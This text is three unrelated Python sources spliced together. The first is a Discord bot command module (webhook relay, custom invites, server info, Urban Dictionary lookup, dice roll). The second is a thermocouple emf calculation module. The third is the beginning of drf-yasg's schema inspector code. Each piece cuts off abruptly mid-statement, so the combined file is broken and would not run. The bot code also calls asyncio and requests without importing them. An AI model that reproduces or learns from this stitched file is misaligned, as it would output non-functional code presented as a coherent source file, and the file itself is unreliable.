from datetime import datetime, date
import string
import random
import copy
import re
import json
import asyncpg
from bs4 import BeautifulSoup
from discord.ext import commands
from cogs.locale import *
from cogs.const import *
from cogs.help import *
from cogs.ids import *
from cogs.util import *
from cogs.discord_hooks import Webhook
from config.constants import *
# Community/support links used by the informational commands below.
support_url = "https://discord.gg/tomori"
site_url = "http://discord.band"
site_commands_url = "https://discord.band/commands"
# OAuth2 authorize URL for inviting the bot with its required permission set.
invite_url = "https://discordapp.com/api/oauth2/authorize?client_id=491605739635212298&permissions=536341719&redirect_uri=https%3A%2F%2Fdiscord.band&scope=bot"
async def o_webhook(client, conn, context, name, value):
    """Relay `value` through a server-configured webhook called `name`.

    Looks up the webhook row in the `mods` table, checks that the author is
    allowed to use it (condition role/user id, administrator, or server owner),
    then posts `value` — as structured webhook kwargs when it parses as a JSON
    object, otherwise as plain text.
    """
    message = context.message
    server_id = message.server.id
    const = await get_cached_server(conn, server_id)
    # NOTE(review): const["locale"] is read before the `if not const` guard below,
    # so a falsy `const` would raise here first — confirm get_cached_server's contract.
    lang = const["locale"]
    em = discord.Embed(colour=0xC5934B)
    if not lang in locale.keys():
        em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=em)
        return
    if not const:
        em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=em)
        return
    em = discord.Embed(colour=int(const["em_color"], 16) + 512)
    # Parameterized query: `name` is user-controlled and was previously formatted
    # straight into the SQL string — an SQL injection vector.
    dat = await conn.fetchrow(
        "SELECT * FROM mods WHERE type = 'webhook' AND name = $1 AND server_id = $2",
        clear_name(name).lower(),
        server_id,
    )
    if not dat:
        em.description = locale[lang]["other_webhook_not_exists"].format(
            who=tagged_dname(message.author),
            name=name
        )
        await client.send_message(message.channel, embed=em)
        return
    # `condition` may hold a role id or a user id that is allowed to trigger the hook.
    cond = dat["condition"] if dat["condition"] else ""
    # Permission gate: matching role, administrator role, matching user id, or owner.
    if not any(cond == role.id or role.permissions.administrator for role in message.author.roles) and not cond == message.author.id and not message.author.id == message.server.owner.id:
        return
    try:
        # Best-effort cleanup of the invoking message; ignore missing permissions.
        await client.delete_message(message)
    except:
        pass
    try:
        ret = json.loads(value)
        if ret and isinstance(ret, dict):
            # A JSON object is forwarded as structured webhook fields.
            msg = Webhook(web_url=dat["value"], **ret)
            await msg.post()
        else:
            msg = Webhook(
                web_url=dat["value"],
                text=value
            )
            await msg.post()
    except:
        # Fall back to posting the raw text (invalid JSON, unexpected kwargs, ...).
        msg = Webhook(
            web_url=dat["value"],
            text=value
        )
        await msg.post()
async def o_about(client, conn, context):
    # Replies with an "about the bot" embed: authors, support-server and site links.
    message = context.message
    server_id = message.server.id
    const = await get_cached_server(conn, server_id)
    # NOTE(review): const["locale"] is read before the `if not const` guard below,
    # so a falsy `const` would raise here first — confirm get_cached_server's contract.
    lang = const["locale"]
    em = discord.Embed(colour=0xC5934B)
    if not lang in locale.keys():
        em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=em)
        return
    if not const:
        em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=em)
        return
    try:
        # Best-effort delete of the invoking message; ignore missing permissions.
        await client.delete_message(message)
    except:
        pass
    # Rebuild the embed using the server's configured colour.
    em = discord.Embed(colour=int(const["em_color"], 16) + 512)
    if const["locale"] == "english":
        em.description = "***Python-bot created by __Pineapple Cookie#0373__\n\
supported by __Unknown__ and __Teris__.***\n\n\
**[Support server]({support_url})**\n\
**[Site]({site_url})**\n\n\
For any questions talk to <@499937748862500864>.".format(support_url=support_url, site_url=site_url)
    else:
        em.description = "***Python-bot написанный __Ананасовой Печенюхой__\n\
при поддержке __Unknown'a__ и __Teris'а__.***\n\n\
**[Ссылка на сервер поддержки]({support_url})**\n\
**[Ссылка на сайт]({site_url})**\n\n\
По всем вопросам обращайтесь к <@499937748862500864>.".format(support_url=support_url, site_url=site_url)
    if not message.server.id in servers_without_follow_us:
        em = await add_follow_links(client, message, const, em)
    await client.send_message(message.channel, embed=em)
    return
async def o_invite(client, conn, context):
    """DM the bot's OAuth2 invite link to the requesting user."""
    message = context.message
    guild_id = message.server.id
    settings = await get_cached_server(conn, guild_id)
    language = settings["locale"]
    embed = discord.Embed(colour=0xC5934B)
    if language not in locale.keys():
        embed.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=embed)
        return
    if not settings:
        embed.description = locale[language]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=embed)
        return
    try:
        await client.delete_message(message)
    except:
        pass
    reply = discord.Embed(colour=int(settings["em_color"], 16) + 512)
    reply.title = locale[language]["other_invite_title"]
    reply.description = invite_url
    if message.server.id not in servers_without_follow_us:
        reply = await add_follow_links(client, message, settings, reply)
    # The invite is sent privately to the author, not to the channel.
    await client.send_message(message.author, embed=reply)
    return
# Alphabet allowed in custom invite codes (ASCII letters only).
standart = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
def clear_code(code_):
    """Drop every character outside the allowed alphabet and cap at 8 chars."""
    return "".join(symbol for symbol in code_ if symbol in standart)[:8]
def generate_code():
    """Return a random 8-letter invite code."""
    return "".join(random.choice(standart) for _ in range(8))
async def o_inv(client, conn, context, code, name):
    """Register a custom short invite `name` pointing at Discord invite `code`.

    If `name` is empty a random 8-letter code is generated (retrying until it is
    unused); otherwise the name is sanitized, length- and uniqueness-checked.
    On success the mapping is stored in the `mods` table.
    """
    message = context.message
    server_id = message.server.id
    const = await get_cached_server(conn, server_id)
    # NOTE(review): const["locale"] is read before the `if not const` guard below,
    # so a falsy `const` would raise here first — confirm get_cached_server's contract.
    lang = const["locale"]
    em = discord.Embed(colour=0xC5934B)
    if not lang in locale.keys():
        em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=em)
        return
    if not const:
        em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=em)
        return
    inv = await client.get_invite(code)
    if not inv:
        em.description = locale[lang]["not_invite"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=em)
        return
    # Normalize to a canonical invite URL.
    inv = "https://discord.gg/{}".format(inv.code)
    codes = await conn.fetch("SELECT name FROM mods WHERE type='custom_invite'")
    def check_code(code_):
        # True when the candidate short name is already taken.
        return any(code_ == _code["name"] for _code in codes)
    if not name:
        name = generate_code()
        while check_code(name):
            name = generate_code()
    else:
        name = clear_code(name.lower())
        if len(name) < 3:
            em.description = locale[lang]["invite_cant_be_less"].format(who=tagged_dname(message.author))
            await client.send_message(message.channel, embed=em)
            return
        if check_code(name):
            em.description = locale[lang]["invite_taken"].format(who=tagged_dname(message.author), invite=name)
            await client.send_message(message.channel, embed=em)
            return
    em = discord.Embed(colour=int(const["em_color"], 16) + 512)
    em.description = locale[lang]["invite_successfully_installed"].format(who=tagged_dname(message.author), invite=name)
    if not message.server.id in servers_without_follow_us:
        em = await add_follow_links(client, message, const, em)
    await asyncio.wait([
        client.send_message(message.channel, embed=em),
        client.delete_message(message),
        # Parameterized INSERT: the author's display name (and potentially the
        # invite data) can contain quotes — the previous str.format build was an
        # SQL injection vector.
        conn.execute(
            "INSERT INTO mods(server_id, name, type, value, condition) VALUES($1, $2, 'custom_invite', $3, $4)",
            server_id,
            name,
            inv,
            "{} [{}]".format(tagged_name(message.author), message.author.id),
        )
    ])
    return
async def o_server(client, conn, context):
    # Posts an embed summarising the current server: owner, prefix, badges,
    # bank balance, channel/member/emoji counts, age and id.
    message = context.message
    server_id = message.server.id
    server = message.server
    const = await get_cached_server(conn, server_id)
    # NOTE(review): const["locale"] is read before the `if not const` guard below,
    # so a falsy `const` would raise here first — confirm get_cached_server's contract.
    lang = const["locale"]
    em = discord.Embed(colour=0xC5934B)
    if not lang in locale.keys():
        em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=em)
        return
    if not const:
        em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=em)
        return
    try:
        # Best-effort delete of the invoking message; ignore missing permissions.
        await client.delete_message(message)
    except:
        pass
    em = discord.Embed(colour=int(const["em_color"], 16) + 512)
    name = server.name
    badges = ""
    # Badge string: unverified servers get a single mocking emoji, otherwise
    # partner/nitro/verified custom emoji are concatenated.
    if const["is_unverified"]:
        badges = "💩"
    else:
        if const["is_partner"]:
            badges += "<:partner:559064087699390524> "
        if const["is_nitro"]:
            badges += "<:nitro:528886245510742017> "
        if const["is_verified"]:
            badges += "<:verified:551470498920529921> "
    if not badges:
        badges = locale[lang]["no"]
    em.set_author(name=name, icon_url=server.icon_url)
    em.add_field(
        name=locale[lang]["other_server_owner"],
        value="{0.name}#{0.discriminator}".format(server.owner),
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_prefix"],
        value=const["prefix"],
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_badges"],
        value=badges,
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_bank"],
        value=str(const["bank"]),
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_channels"],
        value=str(len(server.channels)),
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_members"],
        value=str(len(server.members)),
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_lifetime"],
        value=locale[lang]["other_server_days"].format(int((datetime.utcnow() - server.created_at).days)),
        inline=True
    )
    em.add_field(
        name=":satellite:ID",
        value=server.id,
        inline=True
    )
    em.add_field(
        name=locale[lang]["other_server_emojis"],
        value=str(len(server.emojis)),
        inline=True
    )
    icon_url = message.server.icon_url
    if not icon_url:
        icon_url = client.user.default_avatar_url
    else:
        # Rebuild the CDN URL explicitly (png form) for the thumbnail.
        icon_url = "https://cdn.discordapp.com/icons/{id}/{icon}.png".format(
            id=message.server.id,
            icon=message.server.icon
        )
    em.set_thumbnail(url=icon_url)
    await client.send_message(message.channel, embed=em)
    return
async def o_avatar(client, conn, context, who):
    """Show the avatar of `who` (defaults to the command author) in an embed."""
    message = context.message
    guild_id = message.server.id
    settings = await get_cached_server(conn, guild_id)
    language = settings["locale"]
    embed = discord.Embed(colour=0xC5934B)
    if language not in locale.keys():
        embed.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=embed)
        return
    if not settings:
        embed.description = locale[language]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=embed)
        return
    embed = discord.Embed(colour=int(settings["em_color"], 16) + 512)
    try:
        await client.delete_message(message)
    except:
        pass
    target = who if who else message.author
    embed.title = locale[language]["other_avatar"].format(clear_name(target.display_name[:50]))
    embed.set_image(url=target.avatar_url)
    await client.send_message(message.channel, embed=embed)
    return
async def o_urban(client, conn, context, text):
    # Looks up `text` on Urban Dictionary by scraping the define page and posts
    # the first definition + example (each truncated to Discord's 1024-char
    # embed-field limit).
    message = context.message
    server_id = message.server.id
    const = await get_cached_server(conn, server_id)
    # NOTE(review): const["locale"] is read before the `if not const` guard below,
    # so a falsy `const` would raise here first — confirm get_cached_server's contract.
    lang = const["locale"]
    em = discord.Embed(colour=0xC5934B)
    if not lang in locale.keys():
        em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=em)
        return
    if not const or not const["is_ud"]:
        em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=em)
        return
    em = discord.Embed(colour=int(const["em_color"], 16) + 512)
    icon_url = message.author.avatar_url
    if not icon_url:
        icon_url = message.author.default_avatar_url
    em.set_footer(text=tagged_dname(message.author), icon_url=icon_url)
    text = clear_text(text[:256])
    url = ('https://www.urbandictionary.com/define.php')
    params = {
        "term": text
    }
    # NOTE(review): `requests` is synchronous — this HTTP round-trip blocks the
    # event loop while it runs; consider an async HTTP client.
    s = requests.session()
    s.headers.update({'Content-Type': 'application/json'})
    raw = s.get(url, params=params).text
    soup = BeautifulSoup(raw, 'html5lib')
    # The first element with class "meaning" is the top-voted definition.
    top = soup.find(class_="meaning")
    if not top:
        em.title = locale[lang]["error_title"]
        em.description = locale[lang]["other_urban_error"]
    else:
        definition = top.text.strip()
        if len(definition) > 1024:
            definition = definition[:1021]+"..."
        example = soup.find(class_="example").text.strip()
        if len(example) > 1024:
            example = example[:1021]+"..."
        em.set_author(
            name="Urban Dictionary",
            icon_url="https://apprecs.org/gp/images/app-icons/300/2f/info.tuohuang.urbandict.jpg"
        )
        em.title = text
        em.add_field(
            name=locale[lang]["other_urban_def"],
            value=definition,
            inline=False
        )
        em.add_field(
            name=locale[lang]["other_urban_example"],
            value=example,
            inline=False
        )
    await asyncio.wait([
        client.delete_message(message),
        client.send_message(message.channel, embed=em)
    ])
    return
async def o_roll(client, conn, context, one, two):
    """Roll a random integer between `one` and `two` (inclusive, any order)."""
    message = context.message
    guild_id = message.server.id
    settings = await get_cached_server(conn, guild_id)
    language = settings["locale"]
    embed = discord.Embed(colour=0xC5934B)
    if language not in locale.keys():
        embed.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
        await client.send_message(message.channel, embed=embed)
        return
    if not settings or not settings["is_roll"]:
        embed.description = locale[language]["global_not_available"].format(who=tagged_dname(message.author))
        await client.send_message(message.channel, embed=embed)
        return
    embed = discord.Embed(colour=int(settings["em_color"], 16) + 512)
    # Accept bounds in either order.
    low, high = min(one, two), max(one, two)
    count = random.randint(low, high)
    embed.description = locale[language]["other_roll_response"].format(
        who=tagged_dname(message.author),
        count=count
    )
    await asyncio.wait([
        client.send_message(message.channel, embed=embed),
        client.delete_message(message)
    ])
    return
async def o_servers(client, conn, context, page):
    # Shows one 25-entry page of the bot's servers ranked by member count.
    message = context.message
    em = discord.Embed(colour=0xC5934B)
    em.title = "Top servers"
    # NOTE(review): when the server count is an exact multiple of 25 this yields
    # one extra (empty) trailing page — confirm whether that is acceptable.
    pages = int(len(client.servers)/25)+1
    if page > pages:
        return
    em.set_footer(text="Page {} of {}".format(page, pages))
    for i, server in enumerate(sorted(client.servers, key=lambda k: k.member_count, reverse=True), 1):
        # Skip entries belonging to earlier pages.
        if i <= (page-1)*25:
            continue
        em.add_field(
            inline=True,
            name="#{} {}".format(i, server.name),
            # The fake ".ru" link exists only to surface the server id as the
            # link tooltip in the embed.
            value="[{count}](https://{id}.ru \"{id}\")".format(
                count=server.member_count,
                id=server.id
            )
        )
        # Stop after filling this page's 25 slots.
        if i % 25 == 0:
            break
    await asyncio.wait([
        client.delete_message(message),
        client.send_message(message.channel, embed=em)
    ])
    return
# async def o_like(client, conn, context):
# message = context.message
# server_id = message.server.id
# if message.author.bot or message.channel.is_private:
# return
# const = await conn.fetchrow("SELECT * FROM settings WHERE discord_id = '{discord_id}'".format(discord_id=server_id))
# lang = const["locale"]
# em = discord.Embed(colour=0xC5934B)
# if not lang in locale.keys():
# em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
# await client.send_message(message.channel, embed=em)
# return
# if not const or not const["is_like"]:
# em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
# await client.send_message(message.channel, embed=em)
# return
# em = discord.Embed(colour=int(const["em_color"], 16) + 512)
# try:
# await client.delete_message(message)
# except:
# pass
# now = int(time.time())
# if now - const["like_time"] > 14400:
# likes = const["likes"] + const["like_one"]
# pop_cached_server(server_id)
# if likes > 99:
# likes = 1
# clear_caches()
# await conn.execute("UPDATE settings SET likes = DEFAULT, like_time = DEFAULT")
# await conn.execute("UPDATE settings SET likes = {likes}, like_time = {like_time} WHERE discord_id = '{discord_id}'".format(
# likes=likes,
# like_time=now,
# discord_id=server_id
# ))
# global top_servers
# top_servers = await conn.fetch("SELECT discord_id FROM | |
"""
Python module for computing thermocouple emf values from temperatures.
This module just contains the generic thermocouple class and helper
functions.
"""
__author__ = "<EMAIL>"
__copyright__ = "public domain"
import numpy as np
# scipy.optimize will be imported when needed.
optimize = None


def ensure_import_optimize():
    """Lazily import :mod:`scipy.optimize` into the module-global ``optimize``.

    Subsequent calls are no-ops once the import has succeeded.

    Raises:
        ImportError: if SciPy is not installed.
    """
    global optimize
    # `is None`, not `== None`: identity test against the sentinel (PEP 8).
    if optimize is None:
        try:
            import scipy.optimize as optimize
        except ImportError:
            raise ImportError(
                "Inverse lookup requires scipy.optimize module. Please install SciPy."
            )
class Polynomial_Gaussian(object):
    """\
    Piecewise mathematical function of polynomials plus gaussian, used for
    thermocouple reference.
    Main methods:
      func(T)          # compute the function
      func.__call__(T) # synonym for func(T)
      func.inverse(F)  # perform inverse lookup
    The raw function parameters are stored in .table. The structure of .table
    is a list of tuples giving the different segments of the piecewise function,
    formatted as:
      (minimum T, maximum T, polynomial coefs array, exponential coefs list)
    The polynomial coefs array is in the order of np.polyval(), i.e., starting
    with the highest power and ending with zeroth power (offset).
    Exponential coefs are used as ec[0] * np.exp(ec[1] * (T - ec[2])**2), or
    may be None in which case only the polynomial is used.
    The appropriate temperature and voltage units to use when calling these
    functions are assumed to be degrees Celsius and milivolts as defined in
    NIST, ASTM and OMEGA reference tables.
    .source and .calibration are strings containing information about where the
    function data comes from, and how it is calibrated.
    """

    def __init__(self, table=None, invtable=None, source="", calibration=""):
        self.table = table
        self.invtable = invtable
        self.source = source
        self.calibration = calibration
        # Sanity-check the piecewise table: segments must be ordered and contiguous.
        lastmax = table[0][0]
        for tmin, tmax, _, _ in table:
            if not tmin <= tmax:
                raise ValueError("Temperature limits must be in ascending order.")
            if tmin != lastmax:
                raise ValueError("Pieces' limits must be contiguous.")
            lastmax = tmax

    @property
    def minT(self):
        # Lower bound (ºC) of the function's temperature domain.
        return self.table[0][0]

    @property
    def maxT(self):
        # Upper bound (ºC) of the function's temperature domain.
        return self.table[-1][1]

    @property
    def minV(self):
        # Lower bound (mV) of the inverse table's voltage domain.
        return self.invtable[0][0]

    @property
    def maxV(self):
        # Upper bound (mV) of the inverse table's voltage domain.
        return self.invtable[-1][1]

    def __repr__(self):
        return (
            "<piecewise polynomial+gaussian, domain %g to %g in ºC, output in mV; %s calibrated, from %s>"
            % (self.minT, self.maxT, self.calibration, self.source,)
        )

    def __call__(self, T, derivative=0, out_of_range="raise"):
        """\
        Calculate reference function at given temperature.
        Parameters
        ----------
        T : array_like
            Temperature or array of temperatures.
        derivative: integer
            Use this parameter to evaluate the functional derivative of the emf
            function at a given temperature. Default is derivative=0 (no derivative).
        out_of_range: string, optional
            Determines behaviour for out of range temperatures.
            "raise": raises an ValueError exception. (default)
            "nan": values replaced by nans.
            "extrapolate": extrapolates from closest range. Do not trust this!
        Returns
        -------
        emf : array_like
            computed emf function
        """
        if out_of_range not in ["raise", "nan", "extrapolate"]:
            raise ValueError("invalid out_of_range parameter", out_of_range)
        # np.asarray copies only when needed; np.array(..., copy=False) raises
        # under NumPy 2.0 whenever a copy would be required.
        T = np.asarray(T, order="A")
        emf_choices = [None]
        # We go through the table, determining the selector which is used
        # to choose which piece of the piecewise function to use.
        #  selector = 0   where T is underrange,
        #  selector = 1   where T is in first range,
        #  ...
        #  selector = N   where T is in last (Nth) range,
        #  selector = N+1 where T is overrange.
        tmin = self.minT
        selector = (T >= tmin) * 1
        for tmin, tmax, coefs, ec in self.table:
            selector += T > tmax
            # Here we go ahead and compute emf values using all ranges.
            # this is simple but perhaps a bit inefficient.
            emf = np.polyval(np.polyder(coefs, derivative), T)
            if ec:
                # Type K thermocouple has this annoying exponential addition term,
                # corresponding to a little bump at 127 Celsius.
                dT = T - ec[2]
                gauss = ec[0] * np.exp(ec[1] * dT ** 2)
                if derivative == 0:
                    emf += gauss
                elif derivative == 1:
                    emf += 2.0 * ec[1] * gauss * dT
                elif derivative == 2:
                    emf += 2.0 * ec[1] * gauss * (2.0 * ec[1] * dT ** 2 + 1.0)
                elif derivative == 3:
                    emf += (
                        4.0 * ec[1] * ec[1] * gauss * dT * (2.0 * ec[1] * dT ** 2 + 3.0)
                    )
                else:
                    raise ValueError(
                        "sorry, derivatives > 3 not supported for this type."
                    )
            emf_choices.append(emf)
        emf_choices.append(None)
        if out_of_range == "nan":
            emf_choices[0] = T * np.nan
            emf_choices[-1] = emf_choices[0]
        else:
            # "raise" and "extrapolate" both clamp to the nearest segment here;
            # "raise" then rejects any out-of-range input below.
            emf_choices[0] = emf_choices[1]
            emf_choices[-1] = emf_choices[-2]
            if out_of_range == "raise":
                unders = selector <= 0
                overs = selector > len(self.table)
                if np.any(unders) or np.any(overs):
                    u_temps = np.extract(unders, T)
                    o_temps = np.extract(overs, T)
                    if u_temps.size == 0:
                        u_temps = None
                    if o_temps.size == 0:
                        o_temps = None
                    msg = "Temperatures (ºC) under or over range:"
                    raise ValueError(msg, u_temps, o_temps)
        return np.choose(selector, emf_choices)

    def refinv(self, V):
        """\
        Calculate temperature at given voltage using reference
        inverse polynomial function.
        Parameters
        ----------
        V : array_like
            Voltage or array of voltages.
        Returns
        -------
        t : array_like
            computed t function
        """
        V = np.asarray(V, order="A")
        t_choices = [None]
        vmin = self.minV
        # Same piecewise-selector scheme as __call__, but over voltage segments.
        selector = (V >= vmin) * 1
        for vmin, vmax, coefs, _ in self.invtable:
            selector += V > vmax
            t = np.polyval(coefs, V)
            t_choices.append(t)
        t_choices.append(None)
        # Out-of-range voltages are extrapolated from the nearest segment.
        t_choices[0] = t_choices[1]
        t_choices[-1] = t_choices[-2]
        return np.choose(selector, t_choices)

    def inverse(self, V, Tstart=None, Vtol=1e-6):
        """
        Find the temperature corresponding to a given voltage, via zero-finding.
        Parameters
        ----------
        V: float
            Measured voltage (in milivolts) goes here.
        Tstart: float
            Suggested starting temperature for search. Defaults to reference
            inverse function or midpoint of range.
        Vtol: float
            Desired absolute tolerance of voltage value.
        Returns
        -------
        T: float
            Temperature T, such that func(T) = V
            If the solution does not converge within |func(T) - V| > Vtol,
            an exception is raised.
        Note on implementation
        ----------------------
        First checks if func(Tstart) is close enough to V;
        If this fails, try to use scipy.optimize.newton;
        Failing that, use scipy.optimize.brentq.
        This function requires scipy to be installed when using scipy.optimize.
        It will attemp to import it upon the first usage.
        """
        V = float(V)
        if Tstart is None:
            if self.invtable is None:
                Tstart = 0.5 * (self.minT + self.maxT)
            else:
                Tstart = self.refinv(V)
        # Fast path: the starting guess may already be within tolerance.
        if abs(self(Tstart, out_of_range="extrapolate") - V) <= Vtol:
            return Tstart
        ensure_import_optimize()
        fun0 = lambda T: self(T, out_of_range="extrapolate") - V
        fun1 = lambda T: self(T, derivative=1, out_of_range="extrapolate")
        fun2 = lambda T: self(T, derivative=2, out_of_range="extrapolate")
        try:
            T = optimize.newton(fun0, Tstart, fprime=fun1, fprime2=fun2, tol=Vtol)
            if abs(self(T, out_of_range="extrapolate") - V) > Vtol:
                raise ValueError
        except Exception:
            # newton failed or did not converge — fall back to bracketed brentq.
            # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
            try:
                T = optimize.brentq(fun0, self.minT, self.maxT)
            except ValueError as e:
                if e.args == ("f(a) and f(b) must have different signs",):
                    raise ValueError("Voltage not within in allowed range.")
                else:
                    raise
        if not abs(self(T, out_of_range="extrapolate") - V) <= Vtol:
            raise ValueError("Did not converge within tolerance.")
        return T
class Thermocouple(object):
"""
Thermocouple helper object. This object provides practical
methods for converting between temperatures and measured voltages:
* ``.emf(T)`` returns voltage from known temperature.
* ``.t(V)`` returns temperature from known voltage.
Units according to reference tables - milivolt and degree Celsius
In each case it is possible (and desirable) to pass in the reference
junction temperature by the keyword argument Tref.
"""
def __init__(self, func, ttype=""):
    """
    Wrap a thermocouple characteristic function.

    func is the object that contains the actual function information, and has
    methods __call__, inverse, and attributes .minT, .maxT.
    ttype is a short label for the thermocouple type (stored as ``self.type``
    and used in the repr).
    """
    self.func = func
    self.type = ttype
def __repr__(self):
    """Short description including the valid temperature range."""
    low, high = self.func.minT, self.func.maxT
    span = "%.1f ºC to %.1f ºC" % (low, high)
    return "<%s thermocouple reference (%s)>" % (self.type, span)
@property
def minT(self):
    """Lower bound (ºC) of the underlying function's valid range."""
    return self.func.minT
@property
def maxT(self):
    """Upper bound (ºC) of the underlying function's valid range."""
    return self.func.maxT
def emfr(self, T, Tref=0.0, derivative=0, out_of_range="raise"):
"""
Compute reference electromotive force for given thermocouple measurement
junction temperature and given reference junctions temperature.
Parameters
----------
T : array_like
Temperature or array of temperatures (in ºC).
Tref : float, optional
Reference junctions' temperature (in ºC), defaults to 0.0.
If derivative != 0, Tref is irrelevant.
derivative : integer, optional
Use this parameter to evaluate the functional derivative of
the emf function at a given temperature.
defaults to derivative=0 (no derivative).
out_of_range : {'raise', 'nan', 'extrapolate'}, optional
Determines behaviour for out of range temperatures: raise an
exception, return NaNs, or extrapolate | |
<reponame>onegreyonewhite/drf-yasg
import inspect
import logging
from rest_framework import serializers
from .. import openapi
from ..utils import force_real_str, get_field_default, get_object_classes, is_list_view
#: Sentinel value that inspectors must return to signal that they do not know how to handle an object
NotHandled = object()
logger = logging.getLogger(__name__)
def is_callable_method(cls_or_instance, method_name):
    """Return ``(method, invocable)`` for the named attribute.

    ``invocable`` is True when the retrieved method can be called without
    supplying an explicit first argument (bound instance method, bound
    classmethod, or staticmethod).
    """
    method = getattr(cls_or_instance, method_name)
    if inspect.ismethod(method) and getattr(method, '__self__', None):
        # Already bound to an instance or class; callable as-is.
        return method, True
    try:
        # inspect.getattr_static was added in python 3.2
        from inspect import getattr_static
        descriptor = getattr_static(cls_or_instance, method_name, None)
        # On python 3, unbound instance methods (getattr on the class) and
        # static methods are both plain functions; the static descriptor
        # type is what tells them apart.
        return method, isinstance(descriptor, staticmethod)
    except ImportError:
        # python 2 still has unbound methods, so ismethod <=> !staticmethod
        # TODO: remove when dropping python 2.7
        return method, not inspect.ismethod(method)
def call_view_method(view, method_name, fallback_attr=None, default=None):
    """Safely call a view method during schema generation.

    If the method raises, an informative warning is logged and the value of
    ``fallback_attr`` (or ``default``) is returned instead. The method must be
    callable without any arguments except cls or self.

    :param view: view class or instance; if a class is passed, instance methods won't be called
    :type view: rest_framework.views.APIView or type[rest_framework.views.APIView]
    :param str method_name: name of a method on the view
    :param str fallback_attr: name of an attribute on the view to fall back on, if calling the method fails
    :param default: default value if all else fails
    :return: view method's return value, or value of view's fallback_attr, or default
    :rtype: any or None
    """
    if hasattr(view, method_name):
        try:
            view_method, invocable = is_callable_method(view, method_name)
            if invocable:
                return view_method()
        except Exception:  # pragma: no cover
            logger.warning("view's %s raised exception during schema generation; use "
                           "`getattr(self, 'swagger_fake_view', False)` to detect and short-circuit this",
                           type(view).__name__, exc_info=True)
    if fallback_attr and hasattr(view, fallback_attr):
        return getattr(view, fallback_attr)
    return default
class BaseInspector(object):
    """Base class for all schema inspectors.

    Stores the shared view/path/method/components/request context and
    implements the middleware-style probing protocol used to dispatch an
    object to a chain of inspector classes.
    """

    def __init__(self, view, path, method, components, request):
        """
        :param rest_framework.views.APIView view: the view associated with this endpoint
        :param str path: the path component of the operation URL
        :param str method: the http method of the operation
        :param openapi.ReferenceResolver components: referenceable components
        :param rest_framework.request.Request request: the request made against the schema view; can be None
        """
        self.view = view
        self.path = path
        self.method = method
        self.components = components
        self.request = request

    def process_result(self, result, method_name, obj, **kwargs):
        """After an inspector handles an object (i.e. returns a value other than :data:`.NotHandled`), all inspectors
        that were probed get the chance to alter the result, in reverse order. The inspector that handled the object
        is the first to receive a ``process_result`` call with the object it just returned.
        This behaviour is similar to the Django request/response middleware processing.
        If this inspector has no post-processing to do, it should just ``return result`` (the default implementation).
        :param result: the return value of the winning inspector, or ``None`` if no inspector handled the object
        :param str method_name: name of the method that was called on the inspector
        :param obj: first argument passed to inspector method
        :param kwargs: additional arguments passed to inspector method
        :return: the (possibly modified) result
        """
        return result

    def probe_inspectors(self, inspectors, method_name, obj, initkwargs=None, **kwargs):
        """Probe a list of inspectors with a given object. The first inspector in the list to return a value that
        is not :data:`.NotHandled` wins.
        :param list[type[BaseInspector]] inspectors: list of inspectors to probe
        :param str method_name: name of the target method on the inspector
        :param obj: first argument to inspector method
        :param dict initkwargs: extra kwargs for instantiating inspector class
        :param kwargs: additional arguments to inspector method
        :return: the return value of the winning inspector, or ``None`` if no inspector handled the object
        """
        initkwargs = initkwargs or {}
        tried_inspectors = []
        for inspector in inspectors:
            assert inspect.isclass(inspector), "inspector must be a class, not an object"
            assert issubclass(inspector, BaseInspector), "inspectors must subclass BaseInspector"
            # Instantiate with the shared context; initkwargs carries extras
            # needed by specialized inspectors (e.g. field_inspectors).
            inspector = inspector(self.view, self.path, self.method, self.components, self.request, **initkwargs)
            tried_inspectors.append(inspector)
            method = getattr(inspector, method_name, None)
            if method is None:
                # This inspector does not implement the hook; try the next.
                continue
            result = method(obj, **kwargs)
            if result is not NotHandled:
                break
        else:  # pragma: no cover
            # for/else: no inspector broke out of the loop, i.e. none handled obj
            logger.warning("%s ignored because no inspector in %s handled it (operation: %s)",
                           obj, inspectors, method_name)
            result = None
        # Middleware-style post-processing: every probed inspector, in reverse
        # order, may adjust the winning result.
        for inspector in reversed(tried_inspectors):
            result = inspector.process_result(result, method_name, obj, **kwargs)
        return result

    def get_renderer_classes(self):
        """Get the renderer classes of this view by calling `get_renderers`.
        :return: renderer classes
        :rtype: list[type[rest_framework.renderers.BaseRenderer]]
        """
        return get_object_classes(call_view_method(self.view, 'get_renderers', 'renderer_classes', []))

    def get_parser_classes(self):
        """Get the parser classes of this view by calling `get_parsers`.
        :return: parser classes
